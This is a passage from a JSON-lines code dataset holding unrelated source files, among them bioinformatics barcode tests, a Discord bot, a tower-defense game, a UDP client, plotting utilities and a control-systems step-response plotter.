'TCATTAAAGGCTTGGTG': 1, 'ATAAGCTTTAATAGTTA': 1, 'AGGAGTAGCCGAGTGCT': 1,\n 'AGTATGCAGACATGTGT': 1, 'TAAGGACGCTACCGTAC': 1, 'GCAAAGTAATCACAGAG': 1, 'CAATATCATCCTCGACT': 1,\n 'CCCCAAGGCTGCATCCA': 1, 'CTTTATACGCGAACTCG': 1, 'TCGCGCCTAGAGCTATG': 1, 'GCGCACGACGGTACGCC': 1,\n 'CAAAAATGATCGCGTAG': 1, 'ACGAAGACCAGCTATGG': 1, 'GATTTCAGACTACCTGC': 1, 'GAGGGTGATTCACGACT': 1,\n 'CATAAGCAGGCCAACAG': 1, 'CGACTTGTAGATCTCTG': 1, 'GATGGGCCTGAGGCAGA': 1, 'TAATGGATGAATTTGTG': 1,\n 'AGCCCAGCATACAGAGA': 1, 'CCCCATGACAGCGTTAT': 1, 'TTCCCAGCAAAATACGG': 1, 'GCCTCCACACGAGTACA': 1,\n 'CGTTATGTACATGTTCC': 1, 'CCATCGCCTGTAACGAT': 1, 'GTAACGCTGAACAAAAA': 1, 'AAAACCTCCCTGCCCAT': 1,\n 'TTGAAGACGGTACCTGT': 1, 'CGACCATTGGTAGACAC': 1, 'GCCGTAATCCTTAGAAG': 1, 'TCAGAGCGTATTCATCC': 1,\n 'TATCAGCGCGCGACTTA': 1, 'GAATTTCAGCTGGCAAG': 1, 'CAAACCTGATTAAATCA': 1, 'CATAGCTCTTGTTACAC': 1,\n 'GCGAACTTTATGGCAGA': 1, 'AGTACGGGTACAATGCG': 1, 'CGATCACCCTCAGTATG': 1, 'CACGTATCCTCGTGGAC': 1,\n 'AGGGTACACGCAGCGCG': 1, 'GAGGCCATGGGCAGTCC': 1, 'GCGGTGACAGGATCGGA': 1, 'CCTGAAAACCTTCACTC': 1,\n 'ACGCGCCAGACTTACGC': 1, 'ATGGCGCCTTCCGACGT': 1, 'TCCTTTAGGGGCGAATG': 1, 'AGACACTCCATTTAAAG': 1,\n 'CTCCCAAACACGAGAAT': 1, 'TTACGAGCTCATGAGCA': 1, 'GGTGGCACCTATAACAA': 1, 'CTCAAGGCCCGACGGGC': 1,\n 'TATTAAGGTAATGTAGA': 1, 'TACCGTAAATGCAAATA': 1, 'GGTGACTAGCCGGTAGT': 1, 'GCAAACTGTTACATAAG': 1,\n 'CAGCCTGTCTGCGACAT': 1, 'TAAACTACCTTTGACCA': 1, 'TACATACTGATGCCCCT': 1, 'AAGTAACCAGTCGAAGA': 1,\n 'AAGTATATGGTGGTATA': 1, 'AAGAGCCGGCACGCAAC': 1, 'CACAAGCAGTCAAACAT': 1, 'CGATACCCGTAACGCGT': 1,\n 'ACCCGCCTGAGCTAACA': 1, 'TCCAGACCTTTGCGCGA': 1, 'CGTATGTATCGGCCAAG': 1, 'TAGCATGGGGGGCTGAA': 1,\n 'AACCTGAGAACCGCTCT': 1, 'AGAATCCTCAAACTATA': 1, 'GATAGCTTGATGACGCA': 1, 'ATGGACTACTGCACGCG': 1})\n print(cnter==expectedCounter)\n\ndef test_quantify_read_barcode_map_files():\n outMap = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/testMap.tsv\"\n\n barcode_2_pos, barcode_2_abundance = quantify_barcodes.quantify_read_barcode_map_files(outMap)\n with open('/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/B2P.json') as jf:\n expectedB2P = json.load(jf)\n expectedB2P = {key: tuple(val) for key, val in expectedB2P.items()}\n with open('/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/B2A.json') as jf2:\n expectedB2A = json.load(jf2)\n assert barcode_2_pos == expectedB2P\n assert barcode_2_abundance == expectedB2A\n\n\n\ndef capture(command_str):\n command = shlex.split(command_str)\n proc = subprocess.Popen(command, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,)\n out, err = proc.communicate()\n return out, err, proc\n\ndef to_str(bytes_or_str):\n if isinstance(bytes_or_str, bytes):\n value = bytes_or_str.decode('utf-8')\n else:\n value = bytes_or_str\n return value\n\ndef test_quantify_extract_annotated_correct():\n with open('/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/B2P.json') as jf:\n expectedB2P = json.load(jf)\n barcode_2_position = {key: tuple(val) for key, val in expectedB2P.items()}\n with open('/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/B2A.json') as jf2:\n barcode_2_abundance = Counter(json.load(jf2))\n print(barcode_2_abundance.most_common()[0:10])\n in_fq_file = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/test100.fasta\"\n cnter = quantify_barcodes.quantify_load_fq_barcodes(in_fq_file)\n max_edit_distance = 2\n expectedOutFile = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/quantifyExtract.sorted.out\"\n testOutFile = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/quantifyExtractTest.out\"\n quantify_barcodes.quantify_extract_annotated_correct(barcode_2_position, barcode_2_abundance, cnter, testOutFile, max_edit_distance)\n out, err, proc = capture(f'sort -k1 {testOutFile}')\n with open(expectedOutFile, 'r') as o:\n expectedLines = o.read()\n assert to_str(out) == expectedLines\n\n\ndef test_quantify():\n in_fq_file = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/test100.fasta\"\n map_file = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/testMap.tsv\"\n testOutFile = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/quantifyQuantOut.tsv\"\n expectedOutFile = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/quantifyExtract.sorted.out\"\n tp2 = 'GTGTATAAGAGACAG'\n bc2tp2 = 13\n bcLen = 17\n before = True\n max_edit_distance = 2\n quantify_barcodes.quantify(in_fq_file, map_file, testOutFile, tp2, bc2tp2, bcLen, before, max_edit_distance)\n out, err, proc = capture(f'sort -k1 {testOutFile}')\n with open(expectedOutFile, 'r') as o:\n expectedLines = o.read()\n assert to_str(out) == expectedLines\n\n\n","sub_path":"tests/unit/test_quantify.py","file_name":"test_quantify.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"487639572","text":"class Solution:\n def maxCount(self, m, n, ops):\n \"\"\"\n :type m: int\n :type n: int\n :type ops: List[List[int]]\n :rtype: int\n \"\"\"\n if len(ops) > 0:\n return min([l[0] for l in ops])*min([l[1] for l in ops])\n else:\n return m*n\n\n def maxCount2(self, m, n, ops):\n if len(ops) > 0:\n setA, setB = zip(*ops)\n return min(setA) * min(setB)\n else:\n return m*n\n\nprint(Solution().maxCount2(3,3,[[2,2],[3,3]]))","sub_path":"maxCount.py","file_name":"maxCount.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"296887115","text":"import discord\nimport os\nimport requests\nimport json\nimport random\nfrom replit import db\nfrom keep_alive import keep_alive\n\nclient = discord.Client()\n\nreply_words = [\"ok\", \"Ok\", \"pong\", \"Pong\", \"test\", \"Test\"]\n\nstarter_replies = [\"ok\", \"why\", \"no\"]\n\nif \"responding\" not in db.keys():\n db[\"responding\"] = True\n\n\ndef get_quote():\n response = requests.get(\"https://zenquotes.io/api/random\")\n json_data = json.loads(response.text)\n quote = json_data[0]['q'] + \" -\" + json_data[0]['a']\n return (quote)\n\n\ndef update_replies(reply_message):\n if \"replies\" in db.keys():\n replies = db[\"replies\"]\n replies.append(reply_message)\n db[\"replies\"] = replies\n else:\n db[\"replies\"] = [reply_message]\n\n\ndef delete_reply(index):\n replies = db[\"replies\"]\n if len(replies) > index:\n del replies[index]\n db[\"replies\"] = replies\n\n\n@client.event\nasync def on_ready():\n print('Logged in as {0.user}'.format(client))\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n msg = message.content\n\n if message.content.startswith('$ping'):\n await message.channel.send('Pong!')\n\n if message.content.startswith('$inspire'):\n quote = get_quote()\n await message.channel.send(quote)\n\n if db[\"responding\"]:\n options = starter_replies\n if \"replies\" in db.keys():\n options = options + db[\"replies\"]\n\n if any(word in msg for word in reply_words):\n await message.channel.send(random.choice(options))\n\n if msg.startswith(\"$newreply\"):\n reply_message = msg.split(\"$newreply \", 1)[1]\n update_replies(reply_message)\n await message.channel.send(\"New reply added!\")\n\n if msg.startswith(\"$delreply\"):\n replies = []\n if \"replies\" in db.keys():\n index = int(msg.split(\"$delreply\", 1)[1])\n delete_reply(index)\n replies = db[\"replies\"]\n await message.channel.send(replies)\n\n if msg.startswith(\"$listreplies\"):\n replies = []\n if \"replies\" in db.keys():\n replies = db[\"replies\"]\n await message.channel.send(replies)\n\n if msg.startswith(\"$responding\"):\n value = msg.split(\"$responding \", 1)[1]\n\n if value.lower() == \"true\":\n db[\"responding\"] = True\n await message.channel.send(\"Responding is on.\")\n else:\n db[\"responding\"] = False\n await message.channel.send(\"Responding is off.\")\n if msg.startswith(\"yeet\"):\n await message.channel.send(\"https://tenor.com/bf63y.gif\")\n\nkeep_alive()\nclient.run(os.getenv('TOKEN'))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"648313398","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy\nfrom dataclasses import dataclass\nfrom PyMieSim.polarization import LinearPolarization, JonesVector\n\n\n@dataclass\nclass PlaneWave():\n \"\"\"\n .. note::\n Class representing plane wave beam as a light source for\n light scattering.\n \"\"\"\n wavelength: float\n \"\"\" Wavelenght of the light field. \"\"\"\n polarization: float = 0\n \"\"\" Polarization of the light field in degree. \"\"\"\n amplitude: float = 1\n \"\"\" Maximal value of the electric field at focus point. \"\"\"\n\n def __post_init__(self):\n self.k = 2 * numpy.pi / self.wavelength\n self.amplitude = numpy.atleast_1d(self.amplitude).astype(float)\n self.polarization = numpy.atleast_1d(self.polarization).astype(float)\n self.wavelength = numpy.atleast_1d(self.wavelength).astype(float)\n\n if isinstance(self.polarization, JonesVector):\n self.polarization = self.polarization\n else:\n self.polarization = LinearPolarization(*self.polarization)\n","sub_path":"PyMieSim/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"651266049","text":"import pygame\nfrom towers.tower import Pcr, RapidTest, Alcohol\n\n\n\nclass TowerBuilder:\n def __init__(self, x, y, image, name, market_price):\n self.x = x\n self.y = y\n self.image = image\n self.width = self.image.get_width()\n self.height = self.image.get_height()\n self.name = name\n self.market_price = market_price\n\n def draw(self, win):\n win.blit(self.image, (self.x - self.width//2, self.y - self.height//2))\n\n def build(self, money, x, y):\n \"\"\"\n if the money is enough to build a tower, build the tower and pay for it\n :param money: int\n :return: (int, tower object)\n \"\"\"\n notice = None\n if money > self.market_price:\n if self.name == \"alcohol\":\n built_item = Alcohol(x, y, self.name)\n elif self.name == \"rapid test\":\n built_item = RapidTest(x, y, self.name)\n else:\n built_item = Pcr(x, y, self.name)\n\n notice = f\"Pay {self.market_price} for {self.name}\"\n return money - self.market_price, built_item, notice\n return money, None, notice\n\n\nclass VacantLot:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.width = 30\n self.height = 30\n self.image = pygame.transform.scale(pygame.image.load(\"towers/tower_images/vacant_lot.png\"), (self.width, self.height))\n\n def in_range(self, building):\n if self.x - self.width//2 < building.x < self.x + self.width//2 \\\n and self.y - self.height//2 < building.y < self.y + self.height//2:\n return True\n return False\n\n def draw(self, win):\n win.blit(self.image, (self.x-self.width//2, self.y-self.height//2))","sub_path":"towers/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"61531182","text":"\"\"\"\nudp套接字演示 客户端\n重点代码\n\"\"\"\nfrom socket import *\n\n# 确定服务端地址\nADDR = ('127.0.0.1',8888)\n\n# 创建套接字\nudp_socket = socket(AF_INET,SOCK_DGRAM)\n\n\n# 循环发送接收消息\nwhile True:\n msg = input(\">>\")\n # 空字符串执行break\n if not msg:\n break\n udp_socket.sendto(msg.encode(),ADDR)\n # 客户端结束\n # if msg == \"##\":\n # break\n data,addr = udp_socket.recvfrom(1024)\n print(\"From server:\",data.decode())\n\nudp_socket.close()\n\n\n","sub_path":"month_02/teacher/day11/udp_client.py","file_name":"udp_client.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"330548630","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\n\nfrom ..common.utils import dict_itemgetter\nfrom .constants import (\n FIGURE_SIZE,\n FONT_SIZE,\n NUMERIC_FORMAT,\n)\nfrom .utils import save_plot\n\n\ndef get_named_cm(true_labels, pred_labels, norm_axis=None):\n cm = confusion_matrix(true_labels, pred_labels).astype(float)\n cm_name = 'count'\n if norm_axis is not None:\n norm_cm = cm.sum(axis=norm_axis, keepdims=True)\n norm_cm[norm_cm < 1e-10] = 1.\n cm /= norm_cm\n cm_name = 'precision' if norm_axis == 0 else 'recall'\n return cm, cm_name\n\n\ndef plot_cm(\n true_labels, pred_labels,\n labels_names=None,\n norm_axis=None,\n figsize=FIGURE_SIZE,\n save_path=None,\n need_show=True,\n **kwargs\n):\n \"\"\"\n Plot confusion matrix.\n :param true_labels: ndarray of int\n True objects' classes.\n :param pred_labels: ndarray of int\n Predicted classes (not just probabilities!).\n :param labels_names: ndarray\n Classes names. If None, unique labels are used.\n :param norm_axis: int\n Index of the axis to normalize matrix elements.\n If None, confusion matrix counts are preserved.\n :param figsize: tuple of int\n Param figsize of function pyplot.figure\n :param save_path: str\n Path to the file to save image to. If empty, image is not saved.\n :param need_show: bool\n Indicates whether pyplot.show should be called.\n :param kwargs:\n Keyword arguments for seaborn.heatmap function. Possible arguments:\n annot: bool\n If True, write the data value in each cell.\n If an array-like with the same shape as data,\n then use this to annotate the heatmap instead of the raw data.\n cmap: matplotlib colormap name or object, or list of colors\n The mapping from data values to color space.\n If not provided, the default will depend on whether center is set.\n fmt: str\n String formatting code to use when adding annotations.\n annot_kws: dict\n Keyword arguments for ax.text when annot is True.\n # annot_kws={\"size\": font_size}\n :return:\n \"\"\"\n cm, cm_name = get_named_cm(true_labels, pred_labels, norm_axis)\n tick_labels = labels_names or sorted(map(str, set(true_labels)))\n font_size = dict_itemgetter('size')(dict_itemgetter('annot_kws')(kwargs)) or FONT_SIZE\n\n plt.figure(figsize=figsize)\n ax = sns.heatmap(cm, **kwargs)\n ax.set_yticklabels(\n map(lambda x: 'true ' + x, tick_labels),\n rotation=0, fontdict={'fontsize': font_size}\n )\n ax.set_xticklabels(\n tick_labels,\n rotation=90, fontdict={'fontsize': font_size}\n )\n plt.title('Mean {}: {:.5f}'.format(cm_name, cm.diagonal().mean()))\n\n save_plot(save_path)\n\n if need_show:\n plt.show()\n\n\ndef color_pandas_correlation(dataframe, columns, cmap, num_format=None):\n \"\"\"\n Computes correlation table from the given dataframe columns and returns its colorized version.\n :param dataframe: pandas.DataFrame\n :param columns: list of str\n Columns to use for correlation computing.\n :param cmap: matplotlib colormap name or object, or list of colors\n :param num_format: str\n Numeric format to use.\n :return: pandas.DataFrame\n Colorized correlation table.\n \"\"\"\n correlation_table = dataframe[columns].corr()\n return (\n correlation_table.style\n .background_gradient(cmap=cmap)\n .format(num_format or NUMERIC_FORMAT)\n )\n\n\ndef plot_labels_distribution(labels, save_path=None, need_show=True):\n \"\"\"\n Plots barplot with unique labels count.\n :param labels: ndarray of int\n :param save_path: str\n Path to the file to save image to. If empty, image is not saved.\n :param need_show: bool\n Indicates whether pyplot.show should be called.\n \"\"\"\n unique_classes, unique_count = np.unique(labels, return_counts=True)\n\n plt.bar(unique_classes, unique_count, color='b', alpha=0.5)\n\n plt.title('{} classes distribution'.format(len(unique_classes)))\n plt.xlabel('label')\n plt.ylabel('count')\n\n save_plot(save_path)\n\n if need_show:\n plt.show()\n","sub_path":"visual/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"98873415","text":"# native dependenices\nimport sys\nimport os\nimport decorator\n\n# UI dependencies\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.uic import loadUi\n\n# math dependencies\nimport control as c\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pymbolic as pmbl\n\n# encoder dependencies\nimport imageio\n\nglobal G_s, D_s\n\n\n\n\"\"\"\nAction center, all actions called from gui. \n\"\"\"\n\n\"\"\"\nSym2transfer converts G_s, D_s into a single T_s, then uses algebraic expansion to return a matrix with coefficients\non each order Availability up to 16th order s polynomial. Matrix is then inputted into get_T which calls from the \ncontrols library \n\"\"\"\n\n\ndef sym2transfer(G_s, D_s):\n # inputted as string\n def as_cof(expr):\n\n # string manipulation\n\n # if a negative is in there, pole/zero in RHP, unstable\n if \"-\" in expr:\n return \"Unstable\"\n\n # up to 16th order polynomial\n cof_mat = [0] * 16\n\n # getting rid of white spaces,\n expr_list = expr.replace(\" \", \"\").split(\"+\")\n # cof_list not organized, splitting be the cof and the n order\n # transfer functions like the cofs in reverse\n for n in expr_list:\n # any order greater than 1 represented with **, doing a check for s**1 and s**0 (s and simple cof)\n if \"**\" not in n:\n # if just s\n if n == \"s\":\n cof_mat[-2] = 1\n # cof\n if \"s\" not in n:\n cof_mat[-1] = float(n)\n\n # even if s passing for some reason, fixed\n elif len(n) > 1:\n # to the left of the * sign\n cof = float(n.split(\"*\")[0])\n cof_mat[-2] = float(cof)\n\n # checking for s**n where n>1\n if \"**\" in n:\n # adding a negative sign to order, reverse assigning in cof_mat. adding 1 space for negative indexing\n order = int(\"-\" + n.split(\"**\")[1]) - 1\n # cof always appears to the left of *, taking first instance\n # if no cof then first instance will be s, checking and defaulting to 1 if case\n first = n.split(\"*\")[0]\n if first == \"s\":\n cof_mat[order] = 1\n else:\n cof_mat[order] = float(first)\n\n return cof_mat\n\n def get_T(G_s, D_s):\n # applying D_s to G_s, initializing resultant T_s\n T_s = [\"(\" + G_s[0] + ')*(' + D_s[0] + \")\", \"(\" + G_s[1] + ')*(' + D_s[1] + \")\"]\n # init T\n T = {}\n # init s symbol\n s = pmbl.var(\"s\")\n\n # evaluating string :\n\n # finding isolated s powers, pymbolic sucks RIP sympy\n def get_iso_s(expr):\n s = pmbl.var(\"s\")\n\n # checking if multiplication\n if \"*\" not in expr:\n return str(expr)\n\n # checking if power of s\n for x in range(2, 9):\n if expr == \"s**\" + str(x):\n return expr\n\n # if s just return s\n if expr != \"s\":\n\n # coeff\n if \"s\" not in expr:\n return str(expr)\n\n # get the children of the object, should be Variable(\"s\")\n child_list = list(pmbl.expand(eval(expr)).children)\n\n # count s occ\n expr_list = [str(x) for x in child_list]\n\n # get order\n iso_s_order = expr_list.count('s')\n\n expr_list = [str(x) for x in expr_list if x != \"s\"]\n\n if iso_s_order > 0:\n # if no coefficient example (s*s)\n if iso_s_order == len(child_list):\n expr = \"s**\" + str(iso_s_order)\n # if coefficient example (2*s*s)\n else:\n expr = \"*\".join(expr_list) + \"*(s**\" + str(iso_s_order) + \")\"\n\n expr = str(pmbl.expand(eval(expr)))\n return expr\n\n num_expr = pmbl.expand(eval(T_s[0]))\n den_expr = pmbl.expand(eval(T_s[1]))\n\n # expanding itself 3 times, JUST IN CASE, sometimes expanding once throws a fit\n for n in range(3):\n num_expr = pmbl.expand(num_expr)\n den_expr = pmbl.expand(den_expr)\n\n # expand to get isolated s\n num_expr = get_iso_s(str(num_expr))\n den_expr = get_iso_s(str(den_expr))\n\n # expanding one last time JUST IN CASE\n num_expr = pmbl.expand(eval(num_expr))\n den_expr = pmbl.expand(eval(den_expr))\n\n # get coefficients from expanded polynomial\n T['num'] = as_cof(str(num_expr))\n T['den'] = as_cof(str(den_expr))\n\n transfer = c.tf(T['num'], T['den'])\n return transfer\n\n # execute\n T = get_T(G_s, D_s)\n\n return T\n\n\n\"\"\"\nstep_plotter takes a transfer function and a max time variable and displays the step response, max velocity, and \nmax acceleration. Returns a step info dictionary called info. info is later called from GUI to display into step\ninfo table \n\"\"\"\n\n\n# root function is the plotter function\ndef step_plotter(G_s,D_s, max_t,cssv=-1):\n\n T_s = [\"(\" + G_s[0] + ')*(' + D_s[0] + \")\", \"(\" + G_s[1] + ')*(' + D_s[1] + \")\"]\n\n if cssv != -1:\n s = 0\n #getting current ssv, lim s->0 of T_s\n ssv = eval(T_s[0])/eval(T_s[1])\n\n k = cssv/ssv\n\n #applying k to G_s[0], doesnt matter\n G_s[0] = str(k)+\"*\"+G_s[0]\n transfer = sym2transfer(G_s,D_s)\n\n else:\n\n transfer = sym2transfer(G_s,D_s)\n\n # defining time, 1000 discrete steps\n t = np.linspace(0, max_t, 1000)\n # returns numpy array\n\n\n sr = c.step_response(transfer, t)\n # parsing array\n y = sr[1]\n\n # getting velocity\n dy = []\n time_step = t[1] - t[0]\n for n in range(999):\n dy.append((y[n + 1] - y[n]) / time_step)\n\n # getting acceleration\n ddy = []\n for n in range(998):\n ddy.append((dy[n + 1] - dy[n]) / time_step)\n\n # getting step info\n info = c.step_info(transfer)\n OS = round(info['Overshoot'], 3)\n Ts = round(info['SettlingTime'], 3)\n SSv = round(info['SteadyStateValue'], 3)\n peak = round(info['Peak'], 3)\n max_v = round(max(dy), 4)\n max_a = round(max(ddy), 4)\n\n # plotting displacement over time to step response\n plt.subplot(2, 1, 1)\n plt.plot(t, y)\n plt.ylabel(\"Displacement\")\n plt.xlim([0, max_t])\n\n # drawing Ts line\n plt.axvline(info['SettlingTime'], linewidth=1, linestyle='--', color='b')\n # drawing peak line\n plt.axhline(info['Peak'], linewidth=1, linestyle='--', color='g')\n # drawing SSv line\n plt.axhline(info['SteadyStateValue'], linewidth=1, linestyle='--', color='r')\n\n plt.title(\"OS: \" + str(OS) + \" | Ts: \" + str(Ts) + '\\n' + 'SSv: ' + str(SSv) + ' | Peak: ' + str(\n peak) + '\\n' + \"Max Velocity: \" + str(max_v) + ' | Max Acceleration: ' + str(max_a))\n plt.grid(True)\n\n # plotting velocity\n plt.subplot(4, 1, 3)\n plt.plot(t[:999], dy, \"y\")\n # drawing max v line\n plt.axhline(max(dy), linewidth=1, linestyle='--', color='g')\n plt.grid(True)\n plt.ylabel(\"Velocity\")\n plt.xlim([0, max_t])\n\n # plotting acceleration\n plt.subplot(4, 1, 4)\n plt.plot(t[:998], ddy, 'r')\n plt.ylabel(\"Acceleration\")\n # drawing max v line\n plt.axhline(max(ddy), linewidth=1, linestyle='--', color='g')\n plt.grid(True)\n plt.xlim([0, max_t])\n plt.xlabel('Time')\n\n # plt should be init, showing within class structure of ui, update stepinfo fields first\n\n # rounding info dictionary\n for key in info.keys():\n info[key] = round(info[key], 4)\n\n # adding max v and max a\n info['MaxVelocity'] = round(max(dy), 4)\n info['MaxAcceleration'] = round(max(ddy), 4)\n\n return info\n\n\nG_s = [\"1\",\"1\"]\nD_s = [\"(240*s)+400\",\"(s**4)+(12*(s**3))+(72*(s**2))+(240*s)+400\"]\n\nmax_t = 5\nT = sym2transfer(G_s, D_s)\nstep_plotter(G_s,D_s,max_t,6)\nplt.show()\n","sub_path":"step_testssv.py","file_name":"step_testssv.py","file_ext":"py","file_size_in_byte":8067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"407048982","text":"import argparse\nfrom json import loads\nfrom os import listdir, mkdir\nfrom os.path import isdir, join\nfrom shutil import copy\n\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\n\n\ndef read_and_split_data(data_folder):\n truths_file_path = join(data_folder, 'truth.jsonl')\n\n def get_id_and_class(truth_row):\n truth_row = loads(truth_row)\n return [truth_row['id'], truth_row['truthClass']]\n\n with open(truths_file_path, 'r') as truths_file:\n truth_class_per_instance = np.array(\n list(map(get_id_and_class, truths_file)))\n\n ids, classes = truth_class_per_instance[:,\n 0], truth_class_per_instance[:, 1]\n \n\n return ids, []\n\n\ndef split_and_store_data(train_ids, test_ids, data_folder, output_train_folder, output_test_folder):\n input_instances_file_path = join(data_folder, 'instances.jsonl')\n input_truths_file_path = join(data_folder, 'truth.jsonl')\n\n if not isdir(output_train_folder):\n mkdir(output_train_folder)\n\n if not isdir(output_test_folder):\n mkdir(output_test_folder)\n\n output_train_instances_file_path = join(\n output_train_folder, 'instances.jsonl')\n output_test_instances_file_path = join(\n output_test_folder, 'instances.jsonl')\n\n output_train_truths_file_path = join(output_train_folder, 'truth.jsonl')\n output_test_truths_file_path = join(output_test_folder, 'truth.jsonl')\n\n store_sampled_data(train_ids, input_instances_file_path,\n output_train_instances_file_path, check_for_images=True)\n store_sampled_data(train_ids, input_truths_file_path,\n output_train_truths_file_path)\n\n store_sampled_data(test_ids, input_instances_file_path,\n output_test_instances_file_path, check_for_images=True)\n store_sampled_data(test_ids, input_truths_file_path,\n output_test_truths_file_path)\n\n\ndef store_sampled_data(ids, input_path, output_path, check_for_images=False):\n with open(input_path, 'r', encoding=\"utf8\") as input_file, open(output_path, 'w', encoding=\"utf8\") as output_file:\n for line in input_file:\n line_as_dict = loads(line)\n if line_as_dict['id'] in ids:\n if check_for_images and not line_as_dict['postMedia']:\n continue\n output_file.write(line)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--data-folder', help=\"Folder containing data we want to sample from\")\n parser.add_argument('--output-train-folder',\n help=\"Folder containing training data we acquired by sampling\")\n parser.add_argument('--output-test-folder',\n help=\"Folder containing test data we acquired by sampling\")\n args = parser.parse_args()\n\n train_ids, test_ids = read_and_split_data(args.data_folder)\n split_and_store_data(train_ids, test_ids, args.data_folder,\n args.output_train_folder, args.output_test_folder)\n","sub_path":"filter_instances_on_images.py","file_name":"filter_instances_on_images.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"366644203","text":"\"\"\"from itertools import combinations\n\nt = int(input())\n\nfor tr in range(t):\n n = int(input())\n arr = list(map(int, input().split()))\n cnt = []\n for i in range(n+1):\n a = list(map(list,combinations(arr,i)))\n for j in a:\n if not j:\n cnt.append(0)\n if sum(j) not in cnt:\n cnt.append(sum(j))\n print('#%d' %(tr+1),len(cnt))\"\"\"\n\n\nimport sys\nsys.stdin = open('input.txt')\n\nt = int(input())\n\nfor tr in range(t):\n n = int(input())\n\n arr = list(map(int, input().split()))\n arr.sort()\n a = [0]*(sum(arr)+1)\n visit = [0]\n a[0] = 1\n for i in arr:\n for j in visit[:]:\n if not a[i+j]:\n a[i+j] = 1\n visit.append(i+j)\n print('#%d' %(tr+1),sum(a))","sub_path":"python daily coding/2020.7.06 (SW Expert Academy)/3752번 (가능한 시험 점수).py","file_name":"3752번 (가능한 시험 점수).py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"438887419","text":"print(\"Copy all files from first directory into second directory. Second directory should be created at run time\")\nimport os\nfrom sys import *\nimport shutil\n\n\ndef Creat_Cpy_DIR(dir1, dir2):\n access_rights = 0o777\n flag = os.path.isabs(dir1)\n #print(flag)\n if not flag:\n path = os.path.abspath(dir1)\n\n exists = os.path.isdir(path)\n\n path2 = os.path.abspath(dir2)\n flag2= os.path.isdir(path2)\n print(flag2)\n if not flag2:\n os.mkdir(path2,access_rights)\n print(\"SSSSSSSSS\")\n\n if exists:\n for data in os.listdir(path):\n print(\"Current folder is:\" + data)\n #dobj.write(folder)\n #os.path.dirname(path2)\n d1=os.path.join(path,data)\n d2=os.path.join(path2,data)\n if os.path.isdir(d1):\n shutil.copytree(d1,d2)\n else:\n shutil.copy2(d1,d2)\n\n\n else:\n print(\"Invalid Path\")\n else:\n print(\"Already copied\")\n\ndef main():\n print(\"File name\", argv[1])\n if (len(argv) < 1) or (len(argv) > 3):\n print(\"Error : Invalid number of argumnets\")\n try:\n Creat_Cpy_DIR(argv[1], argv[2])\n except Exception as E:\n print(\"Error : Invalid input\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Assignment10_3.py","file_name":"Assignment10_3.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"574975343","text":"import ast as python_ast\nfrom typing import List\n\nimport nl2prog.language.ast as ast\nfrom nl2prog.language.python import PythonAST\nfrom .utils import is_builtin_type\n\n\ndef base_ast_type(node: PythonAST):\n \"\"\"\n Return the base type of the AST\n \"\"\"\n base_types = set([\n python_ast.mod, python_ast.stmt, python_ast.expr,\n python_ast.expr_context, python_ast.slice, python_ast.boolop,\n python_ast.operator, python_ast.unaryop, python_ast.cmpop,\n python_ast.comprehension, python_ast.excepthandler,\n python_ast.arguments, python_ast.arg, python_ast.keyword,\n python_ast.alias, python_ast.withitem\n ])\n for base in base_types:\n if isinstance(node, base):\n return base\n return type(node)\n\n\ndef to_ast(target: PythonAST) -> ast.AST:\n \"\"\"\n Return the AST corresponding to the Python AST\n\n Parameters\n ----------\n target: PythonAST\n The Python AST to be converted\n\n Returns\n -------\n ast.AST\n The corresponding AST\n \"\"\"\n 